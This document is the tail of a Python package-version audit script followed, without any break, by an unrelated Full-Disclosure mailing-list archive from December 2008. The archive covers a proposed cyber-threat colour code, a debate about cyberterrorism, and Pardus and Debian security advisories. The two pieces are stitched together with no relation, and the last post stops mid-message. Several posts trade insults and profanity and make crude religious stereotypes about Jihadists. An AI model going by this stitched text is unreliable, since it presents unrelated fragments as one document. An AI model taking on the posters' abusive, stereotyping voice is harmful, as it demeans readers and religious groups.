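        # Non-digit prefixes are compared character by character; a missing
        # character weighs 0, so '~' sorts before "nothing" and letters after it.
        na, nb = re.match(r"\D*", a).group(), re.match(r"\D*", b).group()
        a, b = a[len(na):], b[len(nb):]
        for k in range(max(len(na), len(nb))):
            ca = _order(na[k]) if k < len(na) else 0
            cb = _order(nb[k]) if k < len(nb) else 0
            if ca != cb:
                return -1 if ca < cb else 1
        # Digit runs are compared as integers, so 10 > 8 (unlike string order).
        da, db = re.match(r"\d*", a).group(), re.match(r"\d*", b).group()
        a, b = a[len(da):], b[len(db):]
        va, vb = int(da or 0), int(db or 0)
        if va != vb:
            return -1 if va < vb else 1
    return 0


def parse(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch, sep, rest = version.partition(":")
    if not sep:
        epoch, rest = "0", version
    upstream, sep, revision = rest.rpartition("-")
    if not sep:
        upstream, revision = rest, ""
    return int(epoch), upstream, revision


def compare_versions(a, b):
    """Return -1, 0 or 1 as version a is older than, equal to or newer than b."""
    ea, ua, ra = parse(a)
    eb, ub, rb = parse(b)
    if ea != eb:
        return -1 if ea < eb else 1
    return _cmp_part(ua, ub) or _cmp_part(ra, rb)


def is_patched(release, package, installed):
    """True if the installed version is at or above the advisory's fixed version."""
    return compare_versions(installed, FIXED[(release, package)]) >= 0


def audit(release, inventory):
    """Return (package, installed, fixed) for every package still below the fix."""
    findings = []
    for line in inventory.strip().splitlines():
        package, installed = line.split()
        fixed = FIXED.get((release, package))
        if fixed and compare_versions(installed, fixed) < 0:
            findings.append((package, installed, fixed))
    return findings


if __name__ == "__main__":
    for package, installed, fixed in audit("6.06", SAMPLE_INVENTORY):
        print(f"{package}: installed {installed}, needs {fixed} or later")
```

Both advisories also require restarting applications that use the library after the upgrade, which a version check alone does not confirm.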
From xploitable at gmail.com Mon Dec 1 20:52:11 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 1 Dec 2008 20:52:11 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To: <49341071.4050608@gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>
Message-ID: <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com>

Maybe he thinks the same as you and is making fun of the Department of Homeland Security, SANS Internet Storm Center etc.

On Mon, Dec 1, 2008 at 4:27 PM, rholgstad wrote:
> and how does making a color based on these inputs protect people?
>
> Mike C wrote:
>> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote:
>>
>>> By the way, I also noticed that the new site for your project has the
>>> current threat level as yellow.
>>> Is it safe to assume that you've already got
>>> your metric systems in place and running?
>>>
>>
>> Yes,
>>
>> We do have a working framework for color code generation. The inputs
>> to this function include
>>
>> *exploits released in the past week
>> - The severity of the exploit
>> - The application it was in
>> - The language
>> - estimated users of the software
>>
>> *The previous week's color
>>
>> *Localized nature of exploits.
>>
>> We cannot comment more on this until it is refined and standardized.
>> If you are (or know) an antivirus vendor, please contact me offline to
>> move ahead.
>>

From nytrokiss at gmail.com Mon Dec 1 21:30:23 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Mon, 1 Dec 2008 23:30:23 +0200
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To: <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com>
Message-ID: <8a6b8e350812011330m445ce661s419de49f1a47fc5b@mail.gmail.com>

The color system was made in order to give people a quick look at the terror scale. So too this can be something for us to have a quick look at the exploit scale. Remember these colors are for people in the IT industry and not for the average person.

James

On Mon, Dec 1, 2008 at 10:52 PM, n3td3v wrote:
> Maybe he thinks the same as you and is making fun of the Department of
> Homeland Security, SANS Internet Storm Center etc.
>
> On Mon, Dec 1, 2008 at 4:27 PM, rholgstad wrote:
> > and how does making a color based on these inputs protect people?
> >
> > Mike C wrote:
> >> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote:
> >>
> >>> By the way, I also noticed that the new site for your project has the
> >>> current threat level as yellow. Is it safe to assume that you've already got
> >>> your metric systems in place and running?
> >>>
> >>
> >> Yes,
> >>
> >> We do have a working framework for color code generation. The inputs
> >> to this function include
> >>
> >> *exploits released in the past week
> >> - The severity of the exploit
> >> - The application it was in
> >> - The language
> >> - estimated users of the software
> >>
> >> *The previous week's color
> >>
> >> *Localized nature of exploits.
> >>
> >> We cannot comment more on this until it is refined and standardized.
> >> If you are (or know) an antivirus vendor, please contact me offline to
> >> move ahead.
> >>

--
http://www.astorandblack.com/
http://www.jewelerslounge.com/movado-watches-on-sale

From xploitable at gmail.com Mon Dec 1 22:06:10 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 1 Dec 2008 22:06:10 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To: <8a6b8e350812011330m445ce661s419de49f1a47fc5b@mail.gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> <8a6b8e350812011330m445ce661s419de49f1a47fc5b@mail.gmail.com>
Message-ID: <4b6ee9310812011406k2f447c58x81fe2ba0a44cd7dd@mail.gmail.com>

On Mon, Dec 1, 2008 at 9:30 PM, James Matthews wrote:
> The color system was made in order to give people a quick look at the terror
> scale.

What does the terror scale do to help the population who are sitting in their living rooms? It makes for good television on 24-hour news channels while poking my bum, but it does little in the way of doing anything past entertainment & drama.

> Remember these colors are for people in the IT industry and
> not for the average person.

I lol'd

From xploitable at gmail.com Mon Dec 1 22:25:34 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 1 Dec 2008 22:25:34 +0000
Subject: [Full-disclosure] Fwd: Iran executes IT expert who spied for Israel
In-Reply-To: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com>
References: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com>
Message-ID: <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com>

---------- Forwarded message ----------
From: n3td3v
Date: Mon, Dec 1, 2008 at 10:23 PM
Subject: Iran executes IT expert who spied for Israel
To: n3td3v

"A COMPUTER expert has been executed in Iran after he confessed to working for Mossad, the Israeli intelligence service. This provides a rare insight into the intense espionage activity inside the Islamic republic."
http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece

From xploitable at gmail.com Mon Dec 1 22:51:34 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 1 Dec 2008 22:51:34 +0000
Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored
In-Reply-To:
References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com>
Message-ID: <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com>

If they use zero-day exploits then that's illegal.

Secondly, are they using zero-day exploits posted on public mailing lists or using their own home grown exploits that the bad guys and potentially the vendor doesn't know about?

On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray wrote:
> "proof", did you read the article ?
> They are after your bad guys and probably using zero day exploits !?
> On Mon, Dec 1, 2008 at 9:13 PM, n3td3v wrote:
>>
>> http://news.bbc.co.uk/1/hi/technology/7758127.stm
>

From xploitable at gmail.com Mon Dec 1 23:32:59 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 1 Dec 2008 23:32:59 +0000
Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored
In-Reply-To:
References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com>
Message-ID: <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com>

Which court order? Post a link.

On Mon, Dec 1, 2008 at 11:27 PM, Aaron Gray wrote:
> Probably not with a court order.
>
> On Mon, Dec 1, 2008 at 10:51 PM, n3td3v wrote:
>>
>> If they use zero-day exploits then that's illegal.
>>
>> Secondly, are they using zero-day exploits posted on public mailing
>> lists or using their own home grown exploits that the bad guys and
>> potentially the vendor doesn't know about?
>>
>> On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray wrote:
>> > "proof", did you read the article ?
>> > They are after your bad guys and probably using zero day exploits !?
>> > On Mon, Dec 1, 2008 at 9:13 PM, n3td3v wrote:
>> >>
>> >> http://news.bbc.co.uk/1/hi/technology/7758127.stm
>> >
>
>

From joel at helgeson.com Mon Dec 1 18:50:56 2008
From: joel at helgeson.com (Joel Helgeson)
Date: Mon, 1 Dec 2008 12:50:56 -0600
Subject: [Full-disclosure] Security industry software license
In-Reply-To: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com>
References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com>
Message-ID: <93B7B87BB2C7472E905D0BE2F3445766@Appiant>

I agree - the biggest BS term in existence is the term "Cyberterror". If my web server crashes, is it the result of a Jihadist? Do I care? There is no such thing as a cyberterrorist.

Need proof? Answer me this: If a militant Jihadist takes down the US Power Grid via a "Cyber Attack", will he get his 72 virgins on MySpace?

This is based on the assumption that one could find 72 Virgins on MySpace, and those claiming to be so are not pederasts themselves or FBI agents... nevertheless.

Look at the methodology behind the Militant Salafic Jihadist movement; it is kill or convert in order to attain the highest order of glory in heaven. There is no caveat in place for crashing servers.

The motivation behind a Jihadi hacker and a punk criminal hacker is exactly the same, to either cause malicious harm - because they can - or to gain money. End of issue.

----- Original Message -----
From: "Some Guy Posting To Full Disclosure"
To:
Sent: Saturday, November 29, 2008 7:07 PM
Subject: Re: [Full-disclosure] Security industry software license

> Just to summarise what's been said and what I think so we can get back
> on topic, and conclude something:
>
> No-one hacks using metasploit! Go back to 2003.
> Terrorists with metasploit! What do you have a picture in your head of
> Mr. Jihad Bigbeard using metasploit to shutdown a powergrid?
>
> Reasons Why It's Hard to archive:
> - It violates freedom.
> - It's hard to enforce without: invading privacy, expending too much
> money/resources.
> - Most writers of these tools won't want to have to do this (most
> writers of security tools are hackers, you-know: back orifice, pinch,
> exploit kits, phishing kits, malware creation kits, the entire contents
> of milworm, bots, THCs Hydra... it goes on.
> - Geographical constraints. All governments doing the exact same
> thing at the same time? Or one organisation forcing it onto the net
> (with no power to put people in jail or anything).
> - You can't/shouldn't moderate the internet.
>
> Reasons Why It's Pointlessly ineffective:
> - Piratebay.
> - People writing tools intended for hackers.
> - The massive number of tools that you'd have to moderate to be effective.
> - If not everything is a dangerous security tool then it's reduced in
> effectiveness.
> - Most big hacks you see don't take many tools. Like a big database
> being dumped with a browser/scripts.
> - You don't solve the problem, at all. Maybe reduce it a little.
>
>
> Reasons Why It Wouldn't Happen:
> - Most developed western governments like to keep their 1984 "I'm
> watching you" crap behind the curtains.
> - Most governments only do these things because something bad
> happened and they have to make up a law to cover their asses, or
> something bigger than your rapidshare passes is at stake.
> - I'd protest - I'd go to my country's (UK) capital and march in protest!
>
> Reasons Why It Sucks:
> - It violates freedom (programs are intellectual property - you can't
> do that kind of thing to them and call it nice).
> - It would ruin the internet and break a load of enthusiastic geeks'
> hearts.
> - It would force the underground hackers deeper underground.
> - It would discourage security professionals.
>
> Pointless things that people mentioned that made them look like a
> child in front of a shit load of subscribers:
> - Personal comments.
> - Attacks at the way someone writes something instead of what they write
> about.
>
> Questions for to think about/answer:
> - Would you deserve a license. Really? (me: NO!)
> - Would you wish you had one. (me; yeh!)
> - How many of the tools that'd be outlawed have you already written
> an equivalent of? (me: loads).
> - If you had to outlaw things, would you outlaw tor? (me: I don't wanna!)
>
>
> It's a silly idea.
> Final Question:
> - Are we finished? Is it over? Is it established that it's a bad idea now?
>
> --
> I'm your best best friend.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From pinar at pardus.org.tr Tue Dec 2 07:08:46 2008
From: pinar at pardus.org.tr (Pinar Yanardag)
Date: Tue, 02 Dec 2008 09:08:46 +0200
Subject: [Full-disclosure] [PLSA 2008-77] ffmpeg: Multiple DoS Vulnerabilities
Message-ID: <4934DEFE.8080204@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-77            security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-12-02
Severity: 3
Type: Remote
------------------------------------------------------------------------

Summary
=======

Two vulnerabilities have been fixed in ffmpeg which can cause a DoS
(Denial of Service).

Description
===========

1. An endless loop vulnerability when opening corrupt FLV files
   (issue 699). -- fixed in r15738

2. A divide-by-zero vulnerability in sub_packet_size. -- fixed in r15739

Affected packages:

Pardus 2008:
ffmpeg, all before 0.4.9_20080909-48-16

Resolution
==========

There are update(s) for ffmpeg.
You can update them via Package Manager or with a single command from
console:

    pisi up ffmpeg

References
==========

* http://svn.pardus.org.tr/pardus/devel/applications/multimedia/ffmpeg/
* http://bugs.pardus.org.tr/show_bug.cgi?id=8734

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From mike.cartall at gmail.com Tue Dec 2 08:39:49 2008
From: mike.cartall at gmail.com (Mike C)
Date: Tue, 2 Dec 2008 09:39:49 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <49341071.4050608@gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>
Message-ID:

On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote:
> and how does making a color based on these inputs protect people?
>

Once all desktops have an icon or widget (say at the right hand
corner) with the color, and this is consistently seen everywhere, the
users will start associating with their online security. they will be
reminded that they have to be careful with the data they share.

This, if implemented correctly will be a boon to security industry,
where the weakest kinks currently are 'n00b' users.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Tue Dec 2 08:42:37 2008
From: mike.cartall at gmail.com (Mike C)
Date: Tue, 2 Dec 2008 09:42:37 +0100
Subject: [Full-disclosure] Security industry software license
In-Reply-To: <93B7B87BB2C7472E905D0BE2F3445766@Appiant>
References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant>
Message-ID:

On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote:
> I agree - the biggest BS term in existence is the term "Cyberterror". If my
> web server crashes, is it the result of a Jihadist? Do I care?

Yes!
The kind of exploiter decides the kind of evil thing that would
be done from a zombie machine. You wouldn't want your PC to be a part
of an enemy state's arsenal, or an extremist religious organization
now, would you?

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From joel at helgeson.com Tue Dec 2 09:41:15 2008
From: joel at helgeson.com (Joel Helgeson)
Date: Tue, 2 Dec 2008 03:41:15 -0600
Subject: [Full-disclosure] Security industry software license
In-Reply-To:
References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant>
Message-ID:

Please tell me there is sarcasm there?

The exploiter can either use the exploited machine to make money, which
makes him indistinguishable from every other punk on the net, or they
access it simply to destroy it; which makes them a malicious punk. Either
way, I am not terrorized, and Ramzi al-binwhatever ain't gonna make it to
paradise or get his 72 myspace virgins (or second life, or whatever).

The Jihadists have no use for the levels of intelligence gathering
networks that the Russian empire has. What the heck do Jihadists care who
the chain of command is - they lack the military discipline to think that
far ahead.

----- Original Message -----
From: "Mike C"
To: "Joel Helgeson"
Cc: "Some Guy Posting To Full Disclosure" ;
Sent: Tuesday, December 02, 2008 2:42 AM
Subject: Re: [Full-disclosure] Security industry software license

> On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote:
>> I agree - the biggest BS term in existence is the term "Cyberterror". If
>> my
>> web server crashes, is it the result of a Jihadist? Do I care?
>
> Yes! The kind of exploiter decides the kind of evil thing that would
> be done from a zombie machine. You wouldn't want your PC to be a part
> of an enemy state's arsenal, or an extremist religious organization
> now, would you?
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/

From andfarm at gmail.com Tue Dec 2 10:57:10 2008
From: andfarm at gmail.com (Andrew Farmer)
Date: Tue, 2 Dec 2008 02:57:10 -0800
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>
Message-ID:

On 02 Dec 08, at 00:39, Mike C wrote:
> Once all desktops have an icon or widget (say at the right hand
> corner) with the color, and this is consistently seen everywhere, the
> users will start associating with their online security. they will be
> reminded that they have to be careful with the data they share.

Perhaps you can also make a spy show up on the user's screen every
half hour to warn them that their communications may be monitored,
and allow them to report suspicious web sites to the appropriate
authorities.

http://www.telegraph.co.uk/news/worldnews/1561740/index.html

From dannf at debian.org Mon Dec 1 22:49:35 2008
From: dannf at debian.org (dann frazier)
Date: Mon, 1 Dec 2008 15:49:35 -0700
Subject: [Full-disclosure] [SECURITY] [DSA 1676-1] New flamethrower packages fix denial of service
Message-ID: <20081201224935.GE22463@ldl.fc.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1676-1                  security at debian.org
http://www.debian.org/security/                           dann frazier
December 01, 2008                   http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : flamethrower (0.1.8-1+etch1)
Vulnerability  : insecure temp file generation
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-5141
Debian Bug     : 506350

Dmitry E. Oboukhov discovered that flamethrower creates predictable
temporary filenames, which may lead to a local denial of service through
a symlink attack.
For the stable distribution (etch), this problem has been fixed in
version 0.1.8-1+etch1.

For the unstable distribution (sid), this problem has been fixed in
version 0.1.8-2.

We recommend that you upgrade your flamethrower package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64,
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1.diff.gz
    Size/MD5 checksum: 3138 f6263743cb41f4f75ab9f4dbc76a71a5
  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8.orig.tar.gz
    Size/MD5 checksum: 23485 04e1b6c5b4e72879e8aa69fcccb0491f
  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1.dsc
    Size/MD5 checksum: 598 4a880e477706f57bcfb806eb46a81922

Architecture independent packages:

  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1_all.deb
    Size/MD5 checksum: 16880 fbc0c1b237503a9d88521b444e4319e0

These files will probably be moved into the stable distribution on its
next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJNGi7huANDBmkLRkRAtmHAJ46ID1fo23mpT0LaR+58dF75sgdaACgk1R2
I73MleBHGf32hPSwMhRRQbY=
=qNZs
-----END PGP SIGNATURE-----

From j.sentiar at gmail.com Tue Dec 2 13:11:26 2008
From: j.sentiar at gmail.com (j-f sentier)
Date: Tue, 2 Dec 2008 08:11:26 -0500
Subject: [Full-disclosure] Fwd: Iran executes IT expert who spied for Israel
In-Reply-To: <6f80feaf0812020511m68f67809ncbfd6bfcf97731ac@mail.gmail.com>
References: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com> <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com> <6f80feaf0812020511m68f67809ncbfd6bfcf97731ac@mail.gmail.com>
Message-ID: <6f80feaf0812020511p5fd03ce2t394d81575f2f9a90@mail.gmail.com>

Shut up punk, FD is NOT a news relay
Got a mailing list ? Get some play there and fuck off

2008/12/1, n3td3v :
>
> ---------- Forwarded message ----------
> From: n3td3v
> Date: Mon, Dec 1, 2008 at 10:23 PM
> Subject: Iran executes IT expert who spied for Israel
> To: n3td3v
>
>
> "A COMPUTER expert has been executed in Iran after he confessed to
> working for Mossad, the Israeli intelligence service. This provides a
> rare insight into the intense espionage activity inside the Islamic
> republic."
>
> http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/90ebeaeb/attachment.html

From ureleet at gmail.com Tue Dec 2 13:59:06 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 08:59:06 -0500
Subject: [Full-disclosure] Lazy bum approach to security
In-Reply-To: <4b6ee9310811291016k10bac99mf10d2f669accc2f9@mail.gmail.com>
References: <4b6ee9310811291016k10bac99mf10d2f669accc2f9@mail.gmail.com>
Message-ID: <6158bb410812020559x3ab62066h324ac624b0d2f156@mail.gmail.com>

i agree. people need 2 b more proactive, instead of reactive.

On Sat, Nov 29, 2008 at 1:16 PM, andrew. wallace wrote:
> On Wed, Nov 26, 2008 at 5:49 PM, Mike C wrote:
>> I'm sure there's no reason to doubt that. The fact remains full-disclosure is
>> where it all happens.
>
> You're taking yourself into a false sense of security there. If you
> sit on a mailing list like full-disclosure and expect everything to be
> brought to you on a plate you are mistaken. You can't take the lazy
> bum approach to security and say, everything I need to know is on
> full-disclosure. From my experience the majority of stuff goes on in
> the underground communities, full-disclosure is only essentially an
> announcement list, the rest is going on in individual communities.
> What you need to do is get yourself dug into the underground
> communities, you need to get yourself informants and build
> relationships with members of communities, you _really_ can't sit on
> full-disclosure and expect every security community and hacker
> community to bring everything to you. I'm not talking about the n3td3v
> group here because luckily I forward the key stuff to full-disclosure
> for the lazy bums who can't be bothered to engage in individual
> communities and their members. Let me say though, the real
> intelligence isn't on full-disclosure it's elsewhere.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From ureleet at gmail.com Tue Dec 2 13:52:13 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 08:52:13 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>
Message-ID: <6158bb410812020552n65a5dbefmcea47d15df7d0dc8@mail.gmail.com>

all of this is already being done elsewhere. even with desktop apps
for color display. do sumthing original please?

On Tue, Dec 2, 2008 at 5:57 AM, Andrew Farmer wrote:
> On 02 Dec 08, at 00:39, Mike C wrote:
>> Once all desktops have an icon or widget (say at the right hand
>> corner) with the color, and this is consistently seen everywhere, the
>> users will start associating with their online security. they will be
>> reminded that they have to be careful with the data they share.
>
> Perhaps you can also make a spy show up on the user's screen every
> half hour to warn them that their communications may be monitored,
> and allow them to report suspicious web sites to the appropriate
> authorities.
>
> http://www.telegraph.co.uk/news/worldnews/1561740/index.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From ureleet at gmail.com Tue Dec 2 13:56:39 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 08:56:39 -0500
Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored
In-Reply-To: <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com>
References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com>
Message-ID: <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com>

u arent getting it. it has nothing 2 do w/ backdoors. they r talking
about actual backdoors in the code. so that anyone who knows the
backdoor can acess any windows system regarless. they r saying that
microsoft has coded backdoors into the system so that the govt can get
into any system, patched or not.

pay attention.

On Mon, Dec 1, 2008 at 6:32 PM, n3td3v wrote:
> Which court order? Post a link.
>
> On Mon, Dec 1, 2008 at 11:27 PM, Aaron Gray wrote:
>> Probably not with a court order.
>>
>> On Mon, Dec 1, 2008 at 10:51 PM, n3td3v wrote:
>>>
>>> If they use zero-day exploits then that's illegal.
>>>
>>> Secondly, are they using zero-day exploits post on public mailing
>>> lists or using their own home grown exploits that the bad guys and
>>> potentially the vendor doesn't know about?
>>>
>>> On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray wrote:
>>> > "proof", did you read the article ?
>>> > They are after your bad guys and probably using zero day exploits !?
>>> > On Mon, Dec 1, 2008 at 9:13 PM, n3td3v wrote:
>>> >>
>>> >> http://news.bbc.co.uk/1/hi/technology/7758127.stm
>>> >
>>
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From ureleet at gmail.com Tue Dec 2 13:55:03 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 08:55:03 -0500
Subject: [Full-disclosure] Security industry software license
In-Reply-To:
References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant>
Message-ID: <6158bb410812020555l35d2846bqcd7945078617bdca@mail.gmail.com>

does it matter who ur system is hacked by? no. ur system is had
either way. it doesnt belong 2 u.

On Tue, Dec 2, 2008 at 3:42 AM, Mike C wrote:
> On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote:
>> I agree - the biggest BS term in existence is the term "Cyberterror". If my
>> web server crashes, is it the result of a Jihadist? Do I care?
>
> Yes! The kind of exploiter decides the kind of evil thing that would
> be done from a zombie machine. You wouldn't want your PC to be a part
> of an enemy state's arsenal, or an extremist religious organization
> now, would you?
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From ureleet at gmail.com Tue Dec 2 13:53:39 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 08:53:39 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com>
Message-ID: <6158bb410812020553k70ae3056g7daa9c7a7a2c3057@mail.gmail.com>

i was going 2 leave the list, and still would like 2.
however, i c that u r back 2 using ur alias instead of ur real name
again, posting articles which u didn't write, and generally just going
back to ur old ways. i left u alone for what? two days? wow.

On Mon, Dec 1, 2008 at 3:52 PM, n3td3v wrote:
> Maybe he thinks the same as you and is making fun of the Department of
> Homeland Security, SANS Internet Storm Center etc.
>
> On Mon, Dec 1, 2008 at 4:27 PM, rholgstad wrote:
>> and how does making a color based on these inputs protect people?
>>
>> Mike C wrote:
>>> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote:
>>>
>>>> By the way, I also noticed that the new site for your project has the
>>>> current threat level as yellow. Is it safe to assume that you've already got
>>>> your metric systems in place and running?
>>>>
>>>>
>>>
>>> Yes,
>>>
>>> We do have a working framework for color code generation. The inputs
>>> to this function include
>>>
>>> *exploits released in the past week
>>> - The severity of the exploit
>>> - The application it was in
>>> - The language
>>> - estimated users of the software
>>>
>>> *The previous week's color
>>>
>>> *Localized nature of exploits.
>>>
>>> We cannot comment more on this until it is refined and standardized.
>>> If you are (or know) an antivirus vendor, please contact me offline to
>>> move ahead.
>>>
>>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From Valdis.Kletnieks at vt.edu Tue Dec 2 15:16:44 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 02 Dec 2008 10:16:44 -0500
Subject: [Full-disclosure] Security industry software license
In-Reply-To: Your message of "Sat, 29 Nov 2008 18:17:22 GMT." <4b6ee9310811291017r5d641efdx4dc5b375fa43721e@mail.gmail.com>
References: <4b6ee9310811291017r5d641efdx4dc5b375fa43721e@mail.gmail.com>
Message-ID: <39519.1228231004@turing-police.cc.vt.edu>

On Sat, 29 Nov 2008 18:17:22 GMT, "andrew.wallace" said:
> I think we should push for this so that attack platforms that are
> designed for penetration testers aren't used by the bad guys.

Another good article noted by Bruce Schneier:

